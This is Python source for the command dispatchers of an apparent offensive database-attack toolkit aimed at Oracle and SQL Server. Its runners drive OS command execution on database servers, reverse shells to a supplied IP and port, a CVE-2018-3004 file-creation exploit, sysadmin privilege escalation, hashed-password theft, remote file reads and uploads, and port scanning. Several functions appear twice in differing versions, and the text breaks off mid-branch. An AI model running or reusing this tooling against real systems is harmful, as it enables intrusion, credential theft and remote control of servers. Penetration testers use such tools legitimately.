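def runCtxsysModule(args):
    """
    Run the CTXSYS module.

    Options read from *args*: "test-module" runs the module self-test and
    "getFile" reads the named remote file through Ctxsys.readAFile and prints
    it. Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects
    the given option set; otherwise returns None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    ctxsys = Ctxsys(args)
    ctxsys.connection(stopIfError=True)
    if args["test-module"] == True:
        # The original title named the DBMSScheduler library (copy/paste from
        # another runner); this runner tests CTXSYS.
        args["print"].title("Test if the CTXSYS library can be used")
        ctxsys.testAll()
    # Option 1: read file
    if args["getFile"] != None:
        args["print"].title("Read the {0} file on the {1} server".format(args["getFile"], args["server"]))
        data = ctxsys.readAFile(args["getFile"])
        if isinstance(data, Exception):
            args["print"].badNews("Impossible to read the {0} file: {1}".format(args["getFile"], data))
        elif data == "":
            # readAFile does not distinguish "empty" from "absent" here.
            args["print"].goodNews("The {0} file is empty or it doesn't exist".format(args["getFile"]))
        else:
            args["print"].goodNews(
                "Data stored in the {0} file (escape char replace by '\\n'):\n{1}".format(args["getFile"], data)
            )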
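def runTrustworthyPEModule(args):
    '''
    Run the TrustworthyPE module.

    Options read from *args*: "test-module", "be-sysadmin", "drop-sysadmin"
    and "is-sysadmin"; a non-empty "sp-name" overrides the module's stored
    procedure name. Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser
    rejects the given option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "be-sysadmin", "drop-sysadmin", "is-sysadmin"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    trustworthyPE = TrustworthyPE(args)
    trustworthyPE.connect()
    if args["sp-name"] != "":
        trustworthyPE.spName = args["sp-name"]
    if args["test-module"] == True:
        trustworthyPE.testAll()
    if args["be-sysadmin"] == True:
        args['print'].title("Try to become sysadmin with the trustworthy database method")
        status = trustworthyPE.tryPE()
        if status == True:
            args['print'].goodNews("The current user is now sysadmin ! You should run again the all module to know what you can do...")
        else:
            args['print'].badNews("Impossible to put the sysadmin privilege to the current user with this method: {0}".format(status))
    if args["drop-sysadmin"] == True:
        args['print'].title("Try to drop sysadmin privilege to the current user")
        # Interactive confirmation: anything other than 'y' leaves the privilege untouched.
        continu = input("Do you want really drop sysadmin privilege of the current user (y/N) ").lower() == 'y'
        if continu == True:
            status = trustworthyPE.cleanPE()
            if status == True:
                args['print'].goodNews("Sysadmin privilege dropped for the current user")
            else:
                args['print'].badNews("Impossible to drop the sysadmin privilege for the current user: {0}".format(status))
        else:
            args['print'].badNews("Sysadmin privilege has not been modified")
    if args["is-sysadmin"] == True:
        args['print'].title("Is the current user is sysadmin?")
        isSysadmin = trustworthyPE.isCurrentUserSysadmin()
        if isinstance(isSysadmin, Exception):
            args['print'].badNews("Impossible to know if the current user is sysadmin: {0}".format(isSysadmin))
        # 'elif': an Exception instance is not == True, so the original fell
        # through and also printed "NOT sysadmin" after reporting the error.
        elif isSysadmin == True:
            args['print'].goodNews("The current user is sysadmin")
        else:
            args['print'].goodNews("The current user is NOT sysadmin")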
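def runSearchModule(args):
    '''
    Run the Search module.

    Options read from *args*: "test-module" (self-test), "column-names" (a
    pattern searched in column names) and "pwd-column-names" (search for
    password-like column names); "show-empty-columns" is forwarded to both
    searches. Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser
    rejects the given option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "column-names", "pwd-column-names"]) == False:
        return EXIT_MISS_ARGUMENT
    search = Search(args)
    search.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the Search module can be used")
        search.testAll()
    # 'in' replaces dict.has_key(), which no longer exists on Python 3 dicts.
    if 'column-names' in args and args['column-names'] != None:
        args['print'].title("Columns which contains the pattern '{0}'".format(args['column-names']))
        table = search.searchInColumns(args['column-names'], showEmptyColumns=args['show-empty-columns'])
        if search.isEmptyTable(table) == True:
            args['print'].badNews("no result found")
        else:
            args['print'].goodNews(table)
    if args['pwd-column-names'] == True:
        args['print'].title("Columns which contains the pattern ~password~ like (multi language)")
        table = search.searchPwdKeyworkInColumnNames(showEmptyColumns=args['show-empty-columns'])
        if search.isEmptyTable(table) == True:
            args['print'].badNews("no result found")
        else:
            args['print'].goodNews(table)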
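def runDbmsXslprocessorModule(args):
    """
    Run the DbmsXslprocessor module.

    Options read from *args*: "test-module" (self-test) and "putFile", a
    (remotePath, remoteName, localFile) triple uploaded through
    DbmsXslprocessor.putFile. Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the given option set; otherwise None.
    """
    if checkOptionsGivenByTheUser(args, ["test-module", "putFile"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsXslprocessor = DbmsXslprocessor(args)
    dbmsXslprocessor.connection(stopIfError=True)
    if args["test-module"] == True:
        # The original title named the DBMSAdvisor library (copy/paste from
        # another runner); this runner tests DBMS_XSLPROCESSOR.
        args["print"].title("Test if the DBMS_XSLPROCESSOR library can be used")
        dbmsXslprocessor.testAll()
    # Option 1: putLocalFile
    if args["putFile"] != None:
        remotePath, remoteName, localFile = args["putFile"][0], args["putFile"][1], args["putFile"][2]
        args["print"].title(
            "Put the {0} local file in the {1} path (named {2}) of the {3} server".format(
                localFile, remotePath, remoteName, args["server"]
            )
        )
        status = dbmsXslprocessor.putFile(remotePath, remoteName, localFile=localFile)
        if status == True:
            args["print"].goodNews(
                "The {0} local file was put in the remote {1} path (named {2})".format(localFile, remotePath, remoteName)
            )
        else:
            args["print"].badNews(
                "The {0} local file was not put in the remote {1} path (named {2}): {3}".format(
                    localFile, remotePath, remoteName, str(status)
                )
            )
    dbmsXslprocessor.close()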
def runDbmsSchedulerModule(args):
    '''
    Run the DBMS_SCHEDULER module.

    Options read from *args*: "test-module" (self-test), "exec" (a command
    string handed to DbmsScheduler.execOSCommand) and "reverse-shell" (a
    (localip, localport) pair handed to giveReverseShell). Returns
    EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the given
    option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "exec", "reverse-shell"]) == False:
        return EXIT_MISS_ARGUMENT
    printer = args['print']
    scheduler = DbmsScheduler(args)
    scheduler.connection(stopIfError=True)
    if args['test-module'] == True:
        printer.title("Test if the DBMSScheduler library can be used")
        scheduler.testAll()
    # Option 1: exec
    command = args['exec']
    if command is not None:
        printer.title("Execute the `{0}` on the {1} server".format(command, args['server']))
        outcome = scheduler.execOSCommand(command)
        if outcome == True:
            printer.goodNews("The `{0}` command was executed on the {1} server".format(command, args['server']))
        else:
            printer.badNews("The `{0}` command was not executed on the {1} server: {2}".format(command, args['server'], str(outcome)))
        # The job status is queried after every exec attempt, whatever the outcome.
        scheduler.__getJobStatus__()
    # Option 2: reverse shell
    endpoint = args['reverse-shell']
    if endpoint is not None:
        printer.title("Try to give you a reverse shell from the {0} server".format(args['server']))
        scheduler.giveReverseShell(localip=endpoint[0], localport=endpoint[1])
    scheduler.close()
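def runPasswordsModule(args):
    '''
    Run the Passwords module.

    Options read from *args*: "test-module" (self-test), "get-passwords" and
    "get-passwords-from-history". When *args* carries no "info" entry, an Info
    object is loaded from the remote database and stored under args['info']
    first. Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects
    the given option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "info", "get-passwords", "get-passwords-from-history"]) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    passwords.connection(stopIfError=True)
    # 'not in' replaces dict.has_key(), which no longer exists on Python 3 dicts.
    if 'info' not in args:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))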
def runDbmsSchedulerModule(args):
    '''
    Run the DBMS_SCHEDULER module.

    Options read from *args*: "test-module" (self-test), "exec" (command
    string for DbmsScheduler.execOSCommand) and "reverse-shell" ((localip,
    localport) pair for giveReverseShell). Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the given option set; otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "exec", "reverse-shell"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    module = DbmsScheduler(args)
    module.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the DBMSScheduler library can be used")
        module.testAll()
    # Option 1: exec
    if args['exec'] is not None:
        cmd, host = args['exec'], args['server']
        out.title("Execute the `{0}` on the {1} server".format(cmd, host))
        result = module.execOSCommand(cmd)
        if result == True:
            out.goodNews("The `{0}` command was executed on the {1} server".format(cmd, host))
        else:
            out.badNews("The `{0}` command was not executed on the {1} server: {2}".format(cmd, host, str(result)))
        # Job status is queried regardless of the exec outcome.
        module.__getJobStatus__()
    # Option 2: reverse shell
    if args['reverse-shell'] is not None:
        out.title("Try to give you a reverse shell from the {0} server".format(args['server']))
        module.giveReverseShell(localip=args['reverse-shell'][0], localport=args['reverse-shell'][1])
    module.close()
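def runUnwrapperModule(args):
    '''
    Run the unwrapper module.

    Options read from *args*: "file" unwraps a local file with an offline
    Unwrapper, "object-name" unwraps an object stored in the remote database
    with an online (connected) Unwrapper, "test-module" runs the self-test.
    Returns EXIT_MISS_ARGUMENT when none of the three options was given or
    checkOptionsGivenByTheUser rejects the option set; otherwise returns None.
    '''
    if args['test-module'] == False and args['object-name'] == None and args['file'] == None:
        logging.critical("You must choose --test-module or/and --object-name or/and --file")
        return EXIT_MISS_ARGUMENT
    unwrapper = None
    if args['file'] != None:
        unwrapper = Unwrapper(args, offline=True)
    if args['object-name'] != None:
        if checkOptionsGivenByTheUser(args, ["test-module", "object-name"]) == False:
            return EXIT_MISS_ARGUMENT
        # When both --file and --object-name are given the online instance
        # replaces the offline one and is used for both unwrap calls.
        unwrapper = Unwrapper(args, offline=False)
        unwrapper.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the Unwrapper module can be used")
        if unwrapper is None:
            # --test-module alone left 'unwrapper' unbound (NameError) in the
            # original; build a non-connected instance just for the self-test.
            unwrapper = Unwrapper(args, offline=False)
        unwrapper.testAll()
    if args['object-name'] != None:
        args['print'].title("Unwrapping PL/SQL source code of {0} stored in the remote database".format(args['object-name']))
        code = unwrapper.unwrapRemotely(args['object-name'])
        if code == None:
            args['print'].badNews("Impossible to get the source code or to unwrap it. Is it wrapped? Have you permissions?...")
        else:
            args['print'].goodNews(code)
    if args['file'] != None:
        args['print'].title("Unwrapping PL/SQL source code stored in the local file named {0}".format(args['file']))
        code = unwrapper.unwrapLocally(args['file'])
        if code == None:
            args['print'].badNews("Impossible to read the source code or to unwrap it. Is it wrapped? Have you permissions?...")
        else:
            args['print'].goodNews(code)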
def runJobsModule(args):
    '''
    Run the Jobs module (SQL Server Agent stored procedures).

    Options read from *args*: "test-module" (self-test), "exec" (a command
    run through Jobs.createAndExecuteJob, with "type" selecting the job step
    type and defaulting to "CMDEXEC"), "reverse-shell" ((ip, port) pair) and
    "print-jobs". Non-empty "sleep-status" / "sp-name" values override the
    module attributes of the same name. Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the given option set; otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "exec", "reverse-shell", "print-jobs"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    jobs = Jobs(args)
    jobs.connect()
    if args["sleep-status"] != "":
        jobs.sleepStatus = args["sleep-status"]
    if args["sp-name"] != "":
        jobs.spName = args["sp-name"]
    if args["test-module"] == True:
        jobs.testAll()
    if args["exec"] is not None:
        out.title("Try to execute the system command with SQL Server Agent Stored Procedures (Jobs)")
        cmdType = args["type"] if args["type"] != "" else "CMDEXEC"
        # The misspelt keyword 'descritpion' is the parameter name as the
        # module's createAndExecuteJob is called here; verify the signature
        # before renaming it.
        created = jobs.createAndExecuteJob(cmd=args["exec"], descritpion="MDAT", cmdType=cmdType, serverName="(LOCAL)")
        if created != True:
            out.badNews("Impossible to create a job and to execute it: {0}".format(created))
        else:
            # getJobStatus: True = ran, False = failed, None = still running,
            # anything else is reported as an error value.
            jobState = jobs.getJobStatus()
            if jobState == True:
                out.goodNews("The job to execute the system command has been created and executed")
            elif jobState == False:
                out.badNews("The job to execute the system command has not been executed because there is probably a mistake in your command")
            elif jobState == None:
                out.unknownNews("The job status is unknown because it is still running")
            else:
                out.badNews("The system command has NOT been executed on the database server: {0}".format(jobState))
    if args["reverse-shell"] is not None:
        out.title("Try to give you a reverse shell with SQL Server Agent Stored Procedures (Jobs)")
        jobs.getInteractiveReverseShell(args['reverse-shell'][0], args['reverse-shell'][1])
    if args["print-jobs"] is not None:
        out.title("Print list of agent jobs")
        jobs.printJobs()
def runOradbgModule(args):
    '''
    Run the Oradbg module.

    Options read from *args*: "test-module" (self-test) and "exec" (a command
    string handed to Oradbg.execOSCommand). Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the given option set; otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    oradbg = Oradbg(args)
    oradbg.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the Oradbg can be used")
        oradbg.testAll()
    # Option 1: exec
    command = args['exec']
    if command is not None:
        host = args['server']
        out.title("Execute the `{0}` on the {1} server".format(command, host))
        result = oradbg.execOSCommand(command)
        # The success message is hedged ("probably"): the module cannot confirm execution.
        if result == True:
            out.goodNews("The `{0}` command was executed on the {1} server (probably)".format(command, host))
        else:
            out.badNews("The `{0}` command was not executed on the {1} server: {2}".format(command, host, str(result)))
    oradbg.close()
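def runPasswordsModule(args):
    '''
    Run the Passwords module.

    Options read from *args*: "test-module" (self-test), "get-passwords" and
    "get-passwords-from-history". When *args* has no "info" entry, an Info
    object is loaded from the remote database and stored under args['info'].
    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the
    given option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "get-passwords", "get-passwords-from-history"]) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    passwords.connection(stopIfError=True)
    # 'not in' replaces dict.has_key(), which no longer exists on Python 3 dicts.
    if 'info' not in args:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews("Impossible to get hashed passwords from history: {0}".format(status))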
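def runHttpUriTypeModule(args):
    '''
    Run the HTTPURITYPE module.

    Options read from *args*: "test-module" (self-test), "httpUrl" (URL for
    one GET request; the response is also written to "outputFile" when set)
    and "scan-ports" (an (ip, portSpec) pair, portSpec being "a,b,c", "a-b"
    or a single port). Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the option set, -1 when the port
    specification cannot be parsed; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "httpUrl", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    httpUriType = HttpUriType(args)
    httpUriType.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the HTTPURITYPE library can be used")
        httpUriType.testAll()
    # Option 1: httpUrl
    if args['httpUrl'] != None:
        args['print'].title("Send a GET request from {0} to {1}".format(args['connectionStr'], args['httpUrl']))
        response = httpUriType.sendGetRequest(url=args['httpUrl'])
        if isinstance(response, Exception):
            args['print'].badNews("HTTP GET request failed")
        else:
            args['print'].goodNews("The server response is:\n {0}".format(response))
            if args['outputFile'] != None:
                httpUriType.writeFile(args['outputFile'], str(response))
    # Option 2: scan-ports
    if args['scan-ports'] != None:
        portSpec = args['scan-ports'][1]
        ports = []
        try:
            if "," in portSpec:
                ports = portSpec.split(',')
            elif '-' in portSpec:
                startEnd = portSpec.split('-')
                # NOTE(review): range() excludes its upper bound, so "a-b" scans
                # a..b-1 exactly as the original did; confirm whether b should be included.
                ports = [str(aPort) for aPort in range(int(startEnd[0]), int(startEnd[1]))]
            elif portSpec.isdigit():
                # Single port, accepted for consistency with the UTL_HTTP runner.
                ports = [portSpec]
        except ValueError:
            # Non-numeric range bounds previously escaped as an uncaught ValueError.
            ports = []
        if ports == []:
            # The original only logged the error and then scanned an empty list.
            logging.error("Syntax for ports given not recognized (ex: 123-2452 or 143,134,4783)")
            httpUriType.close()
            return -1
        args['print'].title("Scan ports ({0}) of {1} ".format(portSpec, args['scan-ports'][0]))
        resultats = httpUriType.scanTcpPorts(httpObject=httpUriType, ip=args['scan-ports'][0], ports=ports)
        httpUriType.printScanPortResults(resultats)
    httpUriType.close()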
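def runjavaModule(args):
    '''
    Run the JAVA module.

    Options read from *args*: "test-module" (self-test), "exec" (one command
    string handed to Java.execOSCommand), "shell" (interactive pseudo shell),
    "reverse-shell" ((localip, localport) pair) and "create-file-CVE-2018-3004"
    ((data, remoteFilename) pair handed to createOrAppendFileViaCVE_2018_3004).
    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the
    given option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "shell", "reverse-shell", "exec", "create-file-CVE-2018-3004"]) == False:
        return EXIT_MISS_ARGUMENT
    java = Java(args)
    java.connection(stopIfError=True)
    if args['test-module'] == True:
        # The original title named the DBMSScheduler library (copy/paste from
        # another runner); this runner tests the JAVA module.
        args['print'].title("Test if the JAVA library can be used")
        java.testAll()
    # Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'], args['server']))
        # The helper class/function are created before and deleted after the call.
        java.execOSCommand(cmd=args['exec'], printResponse=True, needCreateClassAndFunction=True, needDeleteClassAndFunction=True)
    # Option 2: shell
    if args['shell'] == True:
        args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
        java.getInteractiveShell()
    # Option 3: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
        java.giveReverseShell(localip=args['reverse-shell'][0], localport=args['reverse-shell'][1])
    # Option 4: Bypass built in Oracle JVM security through Deserialization (CVE-2018-3004)
    if args['create-file-CVE-2018-3004'] != None:
        data, remoteFilename = args['create-file-CVE-2018-3004'][0], args['create-file-CVE-2018-3004'][1]
        args['print'].title("Try to create the file {0} on {1}".format(remoteFilename, args['server']))
        status = java.createOrAppendFileViaCVE_2018_3004(data=data, remoteFilename=remoteFilename)
        if isinstance(status, Exception):
            args['print'].badNews("Impossible to create the file {0}: {1}".format(remoteFilename, status))
        elif status == True:
            args['print'].goodNews("The file {0} has been created on the target with data '{1}'".format(remoteFilename, data))
        # Any other return value is silently ignored, as in the original.
    java.close()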
def runTnsCmdModule(args):
    '''
    Run the TNS cmd module (no database account needed).

    Options read from *args*: "ping" (list the ALIASes the listener on
    args['server']:args['port'] reports), "version" (listener version) and
    "status" (raw 'status' command output). Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the given option set; otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["version", "status", "ping"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    tnscmd = Tnscmd(args)
    if args['ping'] == True:
        out.title("Searching ALIAS on the {0} server, port {1}".format(args['server'], args['port']))
        aliases = tnscmd.getAlias()
        out.goodNews("{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID.".format(len(aliases), aliases))
    if args['version'] == True:
        out.title("Searching the version of the Oracle database server ({0}) listening on the port {1}".format(args['server'], args['port']))
        remoteVersion = tnscmd.getVersion()
        out.goodNews("The remote database version is: '{0}'".format(remoteVersion))
    if args['status'] == True:
        out.title("Searching the server status of the Oracle database server ({0}) listening on the port {1}".format(args['server'], args['port']))
        tnscmd.getInformation(cmd='status')
        # getInformation stores the reply; getRecvData returns it afterwards.
        out.goodNews("Data received by the database server: '{0}'".format(tnscmd.getRecvData()))
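def runUtlTcpModule(args):
    '''
    Run the UTL_TCP module.

    Options read from *args*: "test-module" (self-test), "send-packet" (an
    (ip, port, filename) triple handed to UtlTcp.sendPacket) and "scan-ports"
    (an (ip, portSpec) pair, portSpec being "a,b,c", "a-b" or a single port).
    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the
    option set, -1 when the port specification cannot be parsed; otherwise
    returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "send-packet", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    utlTcp = UtlTcp(args)
    utlTcp.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the UTL_TCP library can be used")
        utlTcp.testAll()
    # Option 2: send packet
    if args['send-packet'] != None:
        args['print'].title("Send the packet stored in the {0} file".format(args['send-packet'][2]))
        data = utlTcp.sendPacket(args['send-packet'][0], args['send-packet'][1], filename=args['send-packet'][2])
        if isinstance(data, Exception):
            args['print'].badNews("Impossible to send the packet: {0}".format(data))
        else:
            args['print'].goodNews("Response from the server:\n{0}".format(data))
    # Option 1: tcp Scan
    if args['scan-ports'] != None:
        portSpec = args['scan-ports'][1]
        ports = []
        try:
            if "," in portSpec:
                ports = portSpec.split(',')
            elif '-' in portSpec:
                startEnd = portSpec.split('-')
                # NOTE(review): range() excludes its upper bound, so "a-b" scans
                # a..b-1 exactly as the original did; confirm whether b should be included.
                ports = [str(aPort) for aPort in range(int(startEnd[0]), int(startEnd[1]))]
            elif portSpec.isdigit():
                # Single port, accepted for consistency with the UTL_HTTP runner.
                ports = [portSpec]
        except ValueError:
            # Non-numeric range bounds previously escaped as an uncaught ValueError.
            ports = []
        if ports == []:
            # The original only logged the error and then scanned an empty list.
            logging.error("Syntax for ports given not recognized")
            utlTcp.close()
            return -1
        args['print'].title("Scan ports ({0}) of {1} ".format(portSpec, args['scan-ports'][0]))
        resultats = utlTcp.scanTcpPorts(httpObject=utlTcp, ip=args['scan-ports'][0], ports=ports)
        utlTcp.printScanPortResults(resultats)
    utlTcp.close()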
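def runjavaModule(args):
    '''
    Run the JAVA module.

    Options read from *args*: "test-module" (self-test), "exec" (one command
    string handed to Java.execOSCommand), "shell" (interactive pseudo shell)
    and "reverse-shell" ((localip, localport) pair). Returns EXIT_MISS_ARGUMENT
    when checkOptionsGivenByTheUser rejects the given option set; otherwise
    returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "shell", "reverse-shell", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    java = Java(args)
    java.connection(stopIfError=True)
    if args['test-module'] == True:
        # The original title named the DBMSScheduler library (copy/paste from
        # another runner); this runner tests the JAVA module.
        args['print'].title("Test if the JAVA library can be used")
        java.testAll()
    # Option 1: exec
    if args['exec'] != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(args['exec'], args['server']))
        # The helper class/function are created before and deleted after the call.
        java.execOSCommand(cmd=args['exec'], printResponse=True, needCreateClassAndFunction=True, needDeleteClassAndFunction=True)
    # Option 2: shell
    if args['shell'] == True:
        args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
        java.getInteractiveShell()
    # Option 3: reverse shell
    if args['reverse-shell'] != None:
        args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
        java.giveReverseShell(localip=args['reverse-shell'][0], localport=args['reverse-shell'][1])
    java.close()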
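def runDbmsLob(args):
    '''
    Run the DbmsLob module.

    Options read from *args*: "test-module" (self-test) and "getFile", a
    (remotePath, remoteNameFile, localFile) triple handed to DbmsLob.getFile.
    getFile's result is reported as an error (Exception), missing file
    (False), empty file ('') or its content. Returns EXIT_MISS_ARGUMENT when
    checkOptionsGivenByTheUser rejects the given option set; otherwise None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    dbmsLob = DbmsLob(args)
    dbmsLob.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DbmsLob module can be used")
        dbmsLob.testAll()
    # Option 1: getFile
    if args['getFile'] != None:
        remotePath, remoteNameFile, localFile = args['getFile'][0], args['getFile'][1], args['getFile'][2]
        args['print'].title("Read the {0} file stored in the {1} path".format(remoteNameFile, remotePath))
        data = dbmsLob.getFile(remotePath=remotePath, remoteNameFile=remoteNameFile, localFile=localFile)
        if isinstance(data, Exception):
            args['print'].badNews("There is an error: {0}".format(data))
        elif data == False:
            args['print'].badNews("The {0} file in {1} doesn't exist".format(remoteNameFile, remotePath))
        elif data == '':
            # The original formatted the whole (path, name, local) list here
            # instead of the file name.
            args['print'].badNews("The {0} file is empty".format(remoteNameFile))
        else:
            args['print'].goodNews(
                "Data stored in the {0} file stored in {1} (copied in {2} locally):\n{3}".format(remoteNameFile, remotePath, localFile, data)
            )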
def runPasswordStealerModule(args):
    '''
    Run the PasswordStealer module.

    Requires the "dump" option (checked with checkAccount=True); "test-module"
    additionally runs the self-test. Hashed logins are read with
    stealHashedPasswords, the connection closed, and the result printed (and,
    when "save-to-file" is set, reported as saved to that file). Returns
    EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the given
    option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["dump"], checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    stealer = Passwordstealer(args)
    stealer.connect()
    if args["test-module"] == True:
        stealer.testAll()
    out.title("It is stealing hashed passwords from sql_logins table or sysxlogins table")
    succeeded = stealer.stealHashedPasswords()
    # The connection is released before any output is produced.
    stealer.closeConnection()
    if succeeded != True:
        out.badNews("impossible to steal hashed passwords from sql_logins table or sysxlogins table")
        return
    target = (args['host'], args['port'], args['database'])
    if stealer.credentialsAreEmpty() == True:
        out.badNews("No found hashed passwords on {0}:{1}/{2}".format(*target))
        return
    out.goodNews("Accounts found on {0}:{1}/{2}:".format(*target))
    stealer.printPasswords()
    if args['save-to-file']:
        out.goodNews("Credentials have been saved in the file {0}".format(args['save-to-file']))
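def runCtxsysModule(args):
    '''
    Run the CTXSYS module.

    Options read from *args*: "test-module" (self-test) and "getFile" (a
    remote file name read through Ctxsys.readAFile and printed). Returns
    EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the given
    option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile"]) == False:
        return EXIT_MISS_ARGUMENT
    ctxsys = Ctxsys(args)
    ctxsys.connection(stopIfError=True)
    if args['test-module'] == True:
        # The original title named the DBMSScheduler library (copy/paste from
        # another runner); this runner tests CTXSYS.
        args['print'].title("Test if the CTXSYS library can be used")
        ctxsys.testAll()
    # Option 1: read file
    if args['getFile'] != None:
        args['print'].title("Read the {0} file on the {1} server".format(args['getFile'], args['server']))
        data = ctxsys.readAFile(args['getFile'])
        if isinstance(data, Exception):
            args['print'].badNews("Impossible to read the {0} file: {1}".format(args['getFile'], data))
        elif data == '':
            # readAFile does not distinguish "empty" from "absent" here.
            args['print'].goodNews("The {0} file is empty or it doesn't exist".format(args['getFile']))
        else:
            args['print'].goodNews(
                "Data stored in the {0} file (escape char replace by '\\n'):\n{1}".format(args['getFile'], data))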
def runExternalTableModule (args):
    '''
    Run the External Table module.

    Options read from *args*: "test-module" (self-test), "getFile" (a
    (remotePath, remoteNameFile, localFile) triple handed to
    ExternalTable.getFile; the data is printed with print()) and "exec" (a
    (remotePath, remoteNameFile) pair handed to ExternalTable.execute).
    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser rejects the
    given option set; otherwise returns None.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "getFile", "exec"]) == False:
        return EXIT_MISS_ARGUMENT
    out = args['print']
    externalTable = ExternalTable(args)
    externalTable.connection(stopIfError=True)
    if args['test-module'] == True:
        out.title("Test if the External Table module can be used")
        externalTable.testAll()
    # Option 1: getFile
    fileSpec = args['getFile']
    if fileSpec is not None:
        out.title("Read the {0} file stored in the {1} path".format(fileSpec[1], fileSpec[0]))
        content = externalTable.getFile(remotePath=fileSpec[0], remoteNameFile=fileSpec[1], localFile=fileSpec[2])
        if isinstance(content, Exception):
            out.badNews("There is an error: {0}".format(content))
        else:
            out.goodNews("Data stored in the remote file {0} stored in {1}".format(fileSpec[1], fileSpec[0]))
            print(content)
    # Option 2: exec a script or command
    execSpec = args['exec']
    if execSpec is not None:
        out.title("Execute the {0} command stored in the {1} path".format(execSpec[1], execSpec[0]))
        outcome = externalTable.execute(remotePath=execSpec[0], remoteNameFile=execSpec[1])
        if isinstance(outcome, Exception):
            out.badNews("There is an error: {0}".format(outcome))
        else:
